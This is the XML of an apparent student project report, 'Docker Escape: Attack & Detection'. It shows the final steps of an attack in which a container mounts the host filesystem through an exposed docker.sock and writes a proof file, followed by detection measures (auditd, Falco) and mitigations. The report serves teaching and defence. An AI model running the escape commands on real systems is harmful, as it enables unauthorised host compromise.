    <w:p w14:paraId="51AF45FA" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF45FB" w14:textId="24EEF5B0" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 4</w:t>
      </w:r>
      <w:r w:rsidR="007C10BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Container Escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45FC" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>The host daemon is instructed to spawn a new Alpine container with the entire host filesystem mounted, then write directly to the host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45FD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docker -H unix:///var/run/docker.sock run -d \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45FE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-v /:/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hostfs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--rm alpine \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45FF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chroot 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hostfs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-c 'echo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pwned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&gt; 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/escaped.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF4600" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>No --privileged flag. No kernel exploit. Pure Docker API abuse through an exposed socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF4601" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF4602" w14:textId="7C97018B" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 5</w:t>
      </w:r>
      <w:r w:rsidR="007C10BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proof of Host Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF4603" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>On the victim host machine, outside any container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF4604" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        <w:spacing w:before="30" w:after="3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cat /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/escaped.txt   # output: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pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51AF4605" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>The file written from inside the escape container is present on the real host filesystem. The boundary is fully crossed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF4606" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF4607" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="1B54E8"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B54E8"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5. Detection &amp; Mitigation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100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90"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C3134F" w14:paraId="51AF4612" w14:textId="77777777" w:rsidTr="007C10BF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1AF4608" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B54E8"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Detection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF4609" w14:textId="77777777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Pre-deployment: scan docker run commands for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bind mounts using Docker Bench for Security or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Trivy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="51AF460A" w14:textId="0DDE874A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Runtime</w:t>
            </w:r>
            <w:r w:rsidR="00857E87">
              <w:t xml:space="preserve"> -&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>: monitor /var/run/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> for access events from container processes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF460B" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
              <w:spacing w:before="30" w:after="3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auditctl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-w /var/run/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docker.sock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-p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rwxa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="51AF460C" w14:textId="02EEA3A8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Runtime </w:t>
            </w:r>
            <w:r w:rsidR="00200D46">
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Falco: built-in rules fire the moment </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is accessed from inside a container, with container ID and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> details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51AF460D" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84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>Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF460E" w14:textId="2DCBB14F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Never bind-mount </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in production</w:t>
            </w:r>
            <w:r w:rsidR="00656B9F">
              <w:t xml:space="preserve"> and instead</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">use rootless Docker or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Podman</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> instead</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF460F" w14:textId="77777777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If socket access is required, use Docker Socket Proxy (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Tecnativa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>) to restrict which API calls are permitted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF4610" w14:textId="3626B4D8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Sanitize all user input </w:t>
            </w:r>
            <w:r w:rsidR="00656B9F">
              <w:t xml:space="preserve">which in our case is by </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>replac</w:t>
            </w:r>
            <w:r w:rsidR="00656B9F">
              <w:t xml:space="preserve">ing </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">) with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.run</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) using argument lists</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF4611" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84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Run containers as non-root using the USER directive in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Dockerfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51AF4613" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134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134F" w14:paraId="51AF4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2" w:space="0" w:color="DC2626"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="D1D5DB"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="D1D5DB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AF4614" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="DC2626"/>
              </w:rPr>
              <w:t xml:space="preserve">One exposed socket + one </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="DC2626"/>
              </w:rPr>
              <w:t>unsanitized</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="DC2626"/>
              </w:rPr>
              <w:t xml:space="preserve"> input = full host compromise. No kernel exploit, no special credentials, no zero-day. Two configuration mistakes, widely present in real deployments, were sufficient.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51AF4616" w14:textId="77777777" w:rsidR="00E02E84" w:rsidRDefault="00E02E84"/>
    <w:sectPr w:rsidR="00E02E84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7375" w14:textId="77777777" w:rsidR="00E02E84" w:rsidRDefault="00E02E84">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="666E99E8" w14:textId="77777777" w:rsidR="00E02E84" w:rsidRDefault="00E02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4617" w14:textId="06781EB8" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="2" w:color="E2E5ED"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:before="60"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Zala Vishmayraj </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Jagjitsingh</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B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A63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A6D7" w14:textId="77777777" w:rsidR="00E02E84" w:rsidRDefault="00E02E84">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="77D2A931" w14:textId="77777777" w:rsidR="00E02E84" w:rsidRDefault="00E02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4616" w14:textId="7BB5AF03" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="2" w:color="1B54E8"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1B54E8"/>
      </w:rPr>
      <w:t>Docker Escape</w:t>
    </w:r>
    <w:r w:rsidR="00062579">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1B54E8"/>
      </w:rPr>
      <w:t>:</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1B54E8"/>
      </w:rPr>
      <w:t xml:space="preserve"> Attack &amp; Detection</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="64748B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   OS &amp; Cybersecurity Project   |   GTU-SET   |   241370107071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6DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10805450"/>
    <w:lvl w:ilvl="0" w:tplc="D38EAD8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="480" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A4B2EB72">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17D232BC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B540FFA0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="30104AB2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DD9ADC5C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6A10597C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4C6899F8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="49664656">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="22DE6892"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3A4941C"/>
    <w:lvl w:ilvl="0" w:tplc="701419D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="480" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="37F6242E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="45B23B44">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2770573A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C868E86A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C3D67020">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E4FAF082">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="50704638">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="42D07784">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C12217C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32AE92A8"/>
    <w:lvl w:ilvl="0" w:tplc="E47617BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D0D89F80">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7B9C9738">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CDE45FF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="64F8FB34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9D10DB98">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D9FC3818">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4CE66FD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FAF2A33A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="902838341">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="47457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34F"/>
    <w:rsid w:val="00062579"/>
    <w:rsid w:val="00200D46"/>
    <w:rsid w:val="00582262"/>
    <w:rsid w:val="00656B9F"/>
    <w:rsid w:val="007C10BF"/>
    <w:rsid w:val="00806BC3"/>
    <w:rsid w:val="008218DC"/>
    <w:rsid w:val="00857E87"/>
    <w:rsid w:val="00C3134F"/>
    <w:rsid w:val="00C85766"/>
    <w:rsid w:val="00E02E84"/>
    <w:rsid w:val="00E46C69"/>
    <w:rsid w:val="00FA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F45BE"/>
  <w15:docId w15:val="{FC7E7AF0-C506-40CF-AD70-1F996DB4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25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579"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000625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Vishmayraj Zala</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-27T18:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-27T18:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>